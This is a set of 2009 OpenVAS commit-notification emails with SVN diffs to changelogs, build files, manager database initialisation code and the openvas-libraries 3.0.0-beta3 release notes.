5384) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 06:12:48 UTC (rev 5385) @@ -38,7 +38,6 @@ scripts/fcore_2009_10180.nasl: New plugins. - 2009-10-05 Michael Meyer * scripts/cvspserver_version.nasl, @@ -29697,7 +29696,7 @@ * scripts/nikto.nasl: Removed useless display(). -2009-07-20 Tim Brown +2009-07-20 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl, scripts/checkpoint-vpn1-pat-information-disclosure.nasl: Added @@ -29819,12 +29818,12 @@ scripts/mdksa_2009_148.nasl: Added new plugins. -2009-07-14 Tim Brown +2009-07-14 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl: Fixed dependency. -2009-07-13 Tim Brown +2009-07-13 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl: Now checks response flags. Handles empty responses, DNS compression with @@ -30092,12 +30091,12 @@ current i18n concepts, http://www.openvas.org/openvas-cr-36.html) using the script provided by Markus Schr?der. -2009-07-11 Tim Brown +2009-07-11 Tim Brown * visionsoft-audit-detect.nasl: Fixed misnamed function call. -2009-07-10 Tim Brown +2009-07-10 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl, scripts/visionsoft-audit-detect.nasl: Added new plugins. @@ -40106,7 +40105,7 @@ * scripts/gb_trillian_mult_vuln.nasl: Added new plugin. -2008-12-16 Tim Brown +2008-12-16 Tim Brown * scripts/ike-scan.nasl: Fixed minor bug. @@ -40503,7 +40502,7 @@ * scripts/webserver_favicon.nasl: Added MD5 fingerprints of popular software. -2008-11-05 Tim Brown +2008-11-05 Tim Brown * scripts/checkpoint-vpn1-pat-information-disclosure.nasl: Added check for Checkpoint VPN-1 PAT information disclosure. @@ -40940,7 +40939,7 @@ connections to target host. Changed find_bin function using case insensitive search. -2008-10-12 Tim Brown +2008-10-12 Tim Brown * scripts/aix_maintenance_level.nasl, scripts/apple-sa-2004-08-09.nasl, @@ -41224,7 +41223,7 @@ * MANIFEST: Updated. -2008-09-18 Tim Brown +2008-09-18 Tim Brown openvas.tmpl.in: Honour LDFLAGS. @@ -41306,7 +41305,7 @@ freebsd_twiki1.nasl freebsd_wordpress7.nasl New scripts -2008-09-15 Tim Brown +2008-09-15 Tim Brown * scripts/ike-scan.nasl: Fixes typo in previous fix. @@ -41319,7 +41318,7 @@ * scripts/pnscan.nasl, scripts/portbunny.nasl: Fixed leftovers from experimental ID's to production ID's in error reporting -2008-09-14 Tim Brown +2008-09-14 Tim Brown * scripts/ike-scan.nasl: Completely rewritten, it will now attempt to enumerate supported cipher suites, bruteforce @@ -41463,7 +41462,7 @@ secpod_reg_enum.nasl and secpod_reg.inc as they are re-written. -2008-09-10 Tim Brown +2008-09-10 Tim Brown * openvas-nvt-sync.in: Fixed rsync options not to trust remote group and user. @@ -42851,7 +42850,7 @@ scripts/deb_1495_2.nasl, scripts/deb_1502_1.nasl, scripts/deb_1497_1.nasl: New Debian scripts. -2008-02-20 Tim Brown +2008-02-20 Tim Brown * scripts/telnet_func.inc, scripts/pop3_func.inc, scripts/nfs_func.inc, scripts/misc_func.inc, @@ -44144,7 +44143,7 @@ scripts/debian_DSA-999.nasl: Removed. They are replaced by a new set of debian local security checks. -2007-11-08 Tim Brown +2007-11-08 Tim Brown * openvas-nvt-sync.in: Minor bug fix to resolve issues where current working directory is not the plugins directory. Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Checkpoint VPN-1 PAT information disclosure # # Authors: -# Tim Brown +# Tim Brown # # Fixes (+note about FP): Vlatko Kosturjak # Modified: trunk/openvas-plugins/scripts/dns_xfer.nasl =================================================================== --- trunk/openvas-plugins/scripts/dns_xfer.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/dns_xfer.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -4,7 +4,7 @@ # Modified by Axel Nennker # Modified by Erik Anderson # Modified by Pavel Kankovsky -# Modified by Tim Brown +# Modified by Tim Brown # # See the Nessus Scripts License for details # Modified: trunk/openvas-plugins/scripts/gather-package-list.nasl =================================================================== --- trunk/openvas-plugins/scripts/gather-package-list.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/gather-package-list.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -4,7 +4,7 @@ # # Authors: # Thomas Reinke -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com Modified: trunk/openvas-plugins/scripts/ike-scan.nasl =================================================================== --- trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -4,7 +4,7 @@ # # Authors: # Vlatko Kosturjak (Original development and fixes to rewrite) -# Tim Brown (Complete rewrite) +# Tim Brown (Complete rewrite) # # Copyright: # Copyright (c) 2008 Vlatko Kosturjak Modified: trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Microsoft DNS server internal hostname disclosure detection # # Authors: -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2009 Tim Brown @@ -40,7 +40,7 @@ http://support.microsoft.com/default.aspx?id=198410 See also: -http://www.nth-dimension.org.uk/blog.php?id=31 +http://www.openvas.org/blog.php?id=31 Risk factor: Low"; script_description(desc); Modified: trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Visionsoft Audit multiple vulnerability detection # # Authors: -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2009 Tim Brown and Portcullis Computer Security Ltd From scm-commit at wald.intevation.org Tue Oct 6 08:54:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:54:34 +0200 (CEST) Subject: [Openvas-commits] r5386 - in trunk/openvas-libraries: . misc Message-ID: <20091006065434.DA9C6803D8DB@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 08:54:33 +0200 (Tue, 06 Oct 2009) New Revision: 5386 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/proctitle.c Log: * misc/proctitle.c (setproctitle): Changed start of proctitle to match the new openvas-scanner binary name. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 06:12:48 UTC (rev 5385) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 06:54:33 UTC (rev 5386) @@ -1,3 +1,8 @@ +2009-10-06 Michael Wiegand + + * misc/proctitle.c (setproctitle): Changed start of proctitle to match + the new openvas-scanner binary name. + 2009-10-05 Felix Wolfsteller * include/libopenvas.h: Emptied, except for documentation. Modified: trunk/openvas-libraries/misc/proctitle.c =================================================================== --- trunk/openvas-libraries/misc/proctitle.c 2009-10-06 06:12:48 UTC (rev 5385) +++ trunk/openvas-libraries/misc/proctitle.c 2009-10-06 06:54:33 UTC (rev 5386) @@ -88,7 +88,7 @@ #endif va_end(param); - snprintf(buf2, sizeof(buf2), "openvasd: %s", buf); /* RATS: ignore */ + snprintf(buf2, sizeof(buf2), "openvassd: %s", buf); /* RATS: ignore */ bzero(buf, sizeof(buf)); strncpy(buf, buf2, sizeof(buf) - 1); From scm-commit at wald.intevation.org Tue Oct 6 09:52:27 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 09:52:27 +0200 (CEST) Subject: [Openvas-commits] r5387 - trunk/doc/website Message-ID: <20091006075227.17DF884F7462@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 09:52:25 +0200 (Tue, 06 Oct 2009) New Revision: 5387 Modified: trunk/doc/website/Makefile Log: Make rsync ignore "CVS" files Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 06:54:33 UTC (rev 5386) +++ trunk/doc/website/Makefile 2009-10-06 07:52:25 UTC (rev 5387) @@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync --protocol=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --protocol=29 -urvPC --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 10:28:51 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 10:28:51 +0200 (CEST) Subject: [Openvas-commits] r5388 - trunk/openvas-libraries Message-ID: <20091006082851.9BE3385D9191@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 10:28:50 +0200 (Tue, 06 Oct 2009) New Revision: 5388 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/Makefile Log: * Makefile: Expose $localstatedir and $sysconfdir set during configure time to CMake. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 07:52:25 UTC (rev 5387) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 08:28:50 UTC (rev 5388) @@ -1,5 +1,10 @@ 2009-10-06 Michael Wiegand + * Makefile: Expose $localstatedir and $sysconfdir set during configure + time to CMake. + +2009-10-06 Michael Wiegand + * misc/proctitle.c (setproctitle): Changed start of proctitle to match the new openvas-scanner binary name. Modified: trunk/openvas-libraries/Makefile =================================================================== --- trunk/openvas-libraries/Makefile 2009-10-06 07:52:25 UTC (rev 5387) +++ trunk/openvas-libraries/Makefile 2009-10-06 08:28:50 UTC (rev 5388) @@ -30,11 +30,11 @@ ALLDEPS = openvas-libraries.tmpl all: $(ALLDEPS) - cd base && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DHAVE_WMI=$(HAVE_WMI) && ${MAKE} + cd base && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} -DHAVE_WMI=$(HAVE_WMI) && ${MAKE} cd hg && ${MAKE} cd misc && ${MAKE} - cd nasl && cmake -DCMAKE_INSTALL_PREFIX=${prefix} && ${MAKE} - cd omp && cmake -DCMAKE_INSTALL_PREFIX=${prefix} && ${MAKE} + cd nasl && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} && ${MAKE} + cd omp && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} && ${MAKE} openvas-libraries.tmpl: openvas-libraries.tmpl.in configure VERSION $(SHELL) configure $(CONFIGURE_ARGS) From scm-commit at wald.intevation.org Tue Oct 6 10:50:03 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 10:50:03 +0200 (CEST) Subject: [Openvas-commits] r5389 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091006085003.276CE9503ABF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 10:50:01 +0200 (Tue, 06 Oct 2009) New Revision: 5389 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove verbose flag setting. Correct indentation. * openvas/openvas-client.c (refresh_server): Save context to disk afterwards, so that new scopes can copy it. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/ChangeLog 2009-10-06 08:50:01 UTC (rev 5389) @@ -1,3 +1,11 @@ +2009-10-06 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove + verbose flag setting. Correct indentation. + + * openvas/openvas-client.c (refresh_server): Save context to disk + afterwards, so that new scopes can copy it. + 2009-10-02 Felix Wolfsteller * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-06 08:50:01 UTC (rev 5389) @@ -460,6 +460,9 @@ plugin_cache_write (context, context->plugins_md5sum); } + /* Save the RC to disk, so that new scopes can copy it. */ + context_save_recurse (context); + return NULL; } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 08:50:01 UTC (rev 5389) @@ -1172,8 +1172,6 @@ GtkTreeStore *treestore; const char *message; - //verbose = 1; // FIX - switch(type) { case CONTEXT_SERVER: @@ -1387,7 +1385,7 @@ /* Create the children of the manager in the scope tree. */ treeview = GTK_TREE_VIEW (arg_get_value (arg_get_value (MainDialog, - "SCOPETREE"), + "SCOPETREE"), "TREEVIEW")); treestore = GTK_TREE_STORE (gtk_tree_view_get_model (treeview)); scope_create_treestore_children (treestore, context); From scm-commit at wald.intevation.org Tue Oct 6 11:22:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:22:01 +0200 (CEST) Subject: [Openvas-commits] r5390 - in trunk/openvas-libraries: . misc nasl Message-ID: <20091006092201.64D3F865F477@pyrosoma.intevation.org> Author: felix Date: 2009-10-06 11:21:55 +0200 (Tue, 06 Oct 2009) New Revision: 5390 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/store.c trunk/openvas-libraries/nasl/nasl_scanner_glue.c Log: * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by openvassd in documentation, minor cosmetics. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:21:55 UTC (rev 5390) @@ -1,3 +1,8 @@ +2009-10-06 Felix Wolfsteller + + * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by + openvassd in documentation, minor cosmetics. + 2009-10-06 Michael Wiegand * Makefile: Expose $localstatedir and $sysconfdir set during configure Modified: trunk/openvas-libraries/misc/store.c =================================================================== --- trunk/openvas-libraries/misc/store.c 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/misc/store.c 2009-10-06 09:21:55 UTC (rev 5390) @@ -43,7 +43,7 @@ * store returns NULL (cache is either outdated, contains error or an error * occurred). * - * The store is updated at each openvasd start up. There the plugin loader + * The store is updated at each openvassd start up. There the plugin loader * iterates over plugin files and tries to retrieve the cached version. * If there is no cached version (or @ref store_load_plugin returns Null for * another reason, e.g.because the script file seems to have been modified in @@ -133,7 +133,7 @@ } str = t+1; } - + while(str[0]==' ')str++; if(str[0] != '\0') arg_add_value(ret, str, ARG_INT, 0, (void*)1); Modified: trunk/openvas-libraries/nasl/nasl_scanner_glue.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 09:21:55 UTC (rev 5390) @@ -20,7 +20,7 @@ /** * @file * This file contains all the functions that make the "glue" between - * as NASL script and openvasd. + * as NASL script and openvassd. * (script_*(), *kb*(), scanner_*()) */ @@ -830,18 +830,19 @@ return FAKE_CELL; } -tree_cell * set_kb_item(lex_ctxt * lexic) +tree_cell * +set_kb_item (lex_ctxt * lexic) { struct arglist * script_infos = lexic->script_infos; char * name = get_str_local_var_by_name(lexic, "name"); int type = get_local_var_type_by_name(lexic, "value"); - + if( name == NULL ) { nasl_perror(lexic, "Syntax error with set_kb_item() [null name]\n", name); return FAKE_CELL; } - + if (! lexic->authenticated && strncmp(name, SECRET_KB_PREFIX, sizeof(SECRET_KB_PREFIX) - 1) == 0) { @@ -879,11 +880,11 @@ /** - * Function is used when the script wants to report a problem back to openvasd. + * Function is used when the script wants to report a problem back to openvassd. */ typedef void(*proto_post_something_t)(struct arglist*, int, const char*, const char *); /** - * Function is used when the script wants to report a problem back to openvasd. + * Function is used when the script wants to report a problem back to openvassd. */ typedef void(*post_something_t)(struct arglist*, int, const char*); From scm-commit at wald.intevation.org Tue Oct 6 11:38:05 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:38:05 +0200 (CEST) Subject: [Openvas-commits] r5391 - in trunk/openvas-manager: . src Message-ID: <20091006093805.DBF7B861EACA@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 11:38:00 +0200 (Tue, 06 Oct 2009) New Revision: 5391 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/omp.h trunk/openvas-manager/src/ompd.c trunk/openvas-manager/src/ompd.h trunk/openvas-manager/src/openvasmd.c trunk/openvas-manager/src/tasks_sql.h Log: Complete database initialisation check started yesterday. * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. Enable and complete database initialisation check. * src/manage.h: Update header. * src/omp.c (init_omp): Add nvt_cache_mode arg. Update caller. * src/omp.h: Update header. * src/ompd.c (init_ompd): Add nvt_cache_mode arg. Update caller. * src/ompd.h: Update header. * src/openvasmd.c (main): Add "must init" failure to init_ompd return checks. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/ChangeLog 2009-10-06 09:38:00 UTC (rev 5391) @@ -1,3 +1,20 @@ +2009-10-06 Matthew Mundell + + Complete database initialisation check started yesterday. + + * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. + Enable and complete database initialisation check. + * src/manage.h: Update header. + + * src/omp.c (init_omp): Add nvt_cache_mode arg. Update caller. + * src/omp.h: Update header. + + * src/ompd.c (init_ompd): Add nvt_cache_mode arg. Update caller. + * src/ompd.h: Update header. + + * src/openvasmd.c (main): Add "must init" failure to init_ompd return + checks. + 2009-10-05 Matthew Mundell Move caching of NVT preferences to the database. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/manage.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -52,7 +52,7 @@ extern scanner_t scanner; int -init_manage (GSList*); +init_manage (GSList*, int); void init_manage_process (); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/omp.c 2009-10-06 09:38:00 UTC (rev 5391) @@ -5174,18 +5174,19 @@ * @brief Initialise OMP library. * * @param[in] log_config Logging configuration list. + * @param[in] nvt_cache_mode True when running in NVT caching mode. * * @return 0 success, -1 error, -2 database is wrong version, -3 database * needs to be initialized from server. */ int -init_omp (GSList *log_config) +init_omp (GSList *log_config, int nvt_cache_mode) { g_log_set_handler (G_LOG_DOMAIN, ALL_LOG_LEVELS, (GLogFunc) openvas_log_func, log_config); - return init_manage (log_config); + return init_manage (log_config, nvt_cache_mode); } /** Modified: trunk/openvas-manager/src/omp.h =================================================================== --- trunk/openvas-manager/src/omp.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/omp.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -36,7 +36,7 @@ #define TO_CLIENT_BUFFER_SIZE 26214400 int -init_omp (GSList*); +init_omp (GSList*, int); void init_omp_process (); Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/ompd.c 2009-10-06 09:38:00 UTC (rev 5391) @@ -93,15 +93,16 @@ /** * @brief Initialise the OMP library for the OMP daemon. * - * @param[in] log_config Log configuration + * @param[in] log_config Log configuration + * @param[in] nvt_cache_mode True when running in NVT caching mode. * * @return 0 success, -1 error, -2 database is wrong version, -3 database * needs to be initialized from server. */ int -init_ompd (GSList *log_config) +init_ompd (GSList *log_config, int nvt_cache_mode) { - return init_omp (log_config); + return init_omp (log_config, nvt_cache_mode); } /** Modified: trunk/openvas-manager/src/ompd.h =================================================================== --- trunk/openvas-manager/src/ompd.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/ompd.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -31,7 +31,7 @@ #include int -init_ompd (GSList*); +init_ompd (GSList*, int); int serve_omp (gnutls_session_t*, gnutls_session_t*, Modified: trunk/openvas-manager/src/openvasmd.c =================================================================== --- trunk/openvas-manager/src/openvasmd.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/openvasmd.c 2009-10-06 09:38:00 UTC (rev 5391) @@ -627,7 +627,7 @@ /* Initialise OMP daemon. */ - switch (init_ompd (log_config)) + switch (init_ompd (log_config, 1)) { case 0: break; @@ -636,6 +636,8 @@ free_log_configuration (log_config); exit (EXIT_FAILURE); break; + case -3: + assert (0); case -1: default: g_critical ("%s: failed to initialise OMP daemon\n", __FUNCTION__); @@ -792,7 +794,7 @@ /* Initialise OMP daemon. */ - switch (init_ompd (log_config)) + switch (init_ompd (log_config, 0)) { case 0: break; @@ -801,6 +803,13 @@ free_log_configuration (log_config); exit (EXIT_FAILURE); break; + case -3: + g_critical ("%s: database must be initialised" + " (with the --update command line option)\n", + __FUNCTION__); + free_log_configuration (log_config); + exit (EXIT_FAILURE); + break; case -1: default: g_critical ("%s: failed to initialise OMP daemon\n", __FUNCTION__); Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -889,11 +889,14 @@ * Beware that calling this function while tasks are running may lead to * problems. * + * @param[in] log_config Log configuration. + * @param[in] nvt_cache_mode True when running in NVT caching mode. + * * @return 0 success, -1 error, -2 database is wrong version, -3 database needs * to be initialised from server. */ int -init_manage (GSList *log_config) +init_manage (GSList *log_config, int nvt_cache_mode) { const char *database_version; task_t index; @@ -911,25 +914,36 @@ database_version = sql_string (0, 0, "SELECT value FROM meta" " WHERE name = 'database_version';"); - if (database_version - && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + if (nvt_cache_mode) + { + if (database_version + && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) + return -2; -#if 0 - /** @todo Skip this when in NVT caching mode. */ + /* If database_version was NULL then meta was missing, so assume + * that the database is missing, which is OK. */ + } + else + { + if (database_version) + { + if (strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) + return -2; + } + else + /* Assume database is missing. */ + return -3; - /* Check that the database was initialised from the scanner. */ + /* Check that the database was initialised from the scanner. */ - { - long long int count; - if (sql_int64 (&count, 0, 0, - "SELECT count(*) FROM meta" - " WHERE name = 'nvt_md5sum'" - " OR name = 'nvt_preferences_enabled';") - || count < 2) - return -3; - } -#endif + long long int count; + if (sql_int64 (&count, 0, 0, + "SELECT count(*) FROM meta" + " WHERE name = 'nvts_md5sum'" + " OR name = 'nvt_preferences_enabled';") + || count < 2) + return -3; + } /* Ensure the tables exist. */ From scm-commit at wald.intevation.org Tue Oct 6 11:43:07 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:43:07 +0200 (CEST) Subject: [Openvas-commits] r5392 - in trunk/openvas-libraries: . doc Message-ID: <20091006094307.9B35F861EAB2@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:43:06 +0200 (Tue, 06 Oct 2009) New Revision: 5392 Modified: trunk/openvas-libraries/CHANGES trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Preparing the openvas-libraries 3.0.0-beta3 release. * CHANGES: Updated. * VERSION: Set to 3.0.0.beta3. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/CHANGES =================================================================== --- trunk/openvas-libraries/CHANGES 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/CHANGES 2009-10-06 09:43:06 UTC (rev 5392) @@ -1,3 +1,55 @@ +openvas-libraries 3.0.0-beta3 (2009-10-06) + +This release is the third beta version of openvas-libraries +leading up to the upcoming 3.0 release of OpenVAS. +It introduces a significantly improved and changed source +code architecture and therefore introduces a new API for the +other OpenVAS components. + +OpenVAS 3.0 will introduce a new architecture where openvas-libraries +now includes openvas-libnasl as well as redundant code from openvas-client +and where openvas-server is renamed to openvas-scanner and includes any +platform-dependent elements of openvas-plugins. As a result of this, +the source code will shrink, though new features will be added. Also, +for running the scanner now only 2 modules are required (instead of 4 +as for OpenVAS 2.0). + +New features of OpenVAS include support for IPv6 and WMI-Clients. +Version 3.0 prepares the new OpenVAS Manager and OpenVAS Administrator +as optional extension. This combination leverages the vulnerability +scanner to a comprehensive vulnerability management solution. + +The "beta" releases are intended to allow testing of the upcoming +3.0 series. It should be kept separate from OpenVAS 2.0 installations +and not be used in a production environment. + +Many thanks to everyone who has contributed to the 3.0.0 release: +Chandrashekhar B, Marcus Brinkmann, Tim Brown, Vlatko Kosturjak, Michael Meyer, +Matthew Mundell, Laban Mwangi, Srinivasa NL, Jan Wagner, Jan-Oliver Wagner, +Michael Wiegand and Felix Wolfsteller. + +Main changes compared to 2.0.x: + +* IPv6 support +* WMI-Client support +* Integration of openvas-libnasl +* New library "base" +* New library "omp" +* Former libopenvas renamed to libopenvas_misc +* New NVT cache implementation to overcome limitations +* Several files from openvas-client integrated +* Use of "cmake" to build base, omp and nasl +* glib dependency raised from 2.6 to 2.12 + +Main changes compared to 3.0.0-beta2: + +* Minimum cmake version raised from 2.4 to 2.6 +* Internal library reorganisation +* Proctitle now contains the correct binary name for openvas-scanner +* Configured values for the local state directory and for the system + configuration directory are now honoured correctly during build time + + openvas-libraries 3.0.0-beta2 (2009-09-28) This release is the second beta version of openvas-libraries Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:43:06 UTC (rev 5392) @@ -1,3 +1,13 @@ +2009-10-06 Michael Wiegand + + Preparing the openvas-libraries 3.0.0-beta3 release. + + * CHANGES: Updated. + + * VERSION: Set to 3.0.0.beta3. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + 2009-10-06 Felix Wolfsteller * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/VERSION 2009-10-06 09:43:06 UTC (rev 5392) @@ -1 +1 @@ -3.0.0.beta3.SVN +3.0.0.beta3 Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:43:06 UTC (rev 5392) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:43:06 UTC (rev 5392) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 11:46:36 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:46:36 +0200 (CEST) Subject: [Openvas-commits] r5393 - tags Message-ID: <20091006094636.00946865F477@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:46:36 +0200 (Tue, 06 Oct 2009) New Revision: 5393 Added: tags/openvas-libraries-release-3.0.0-beta3/ Log: Tagging 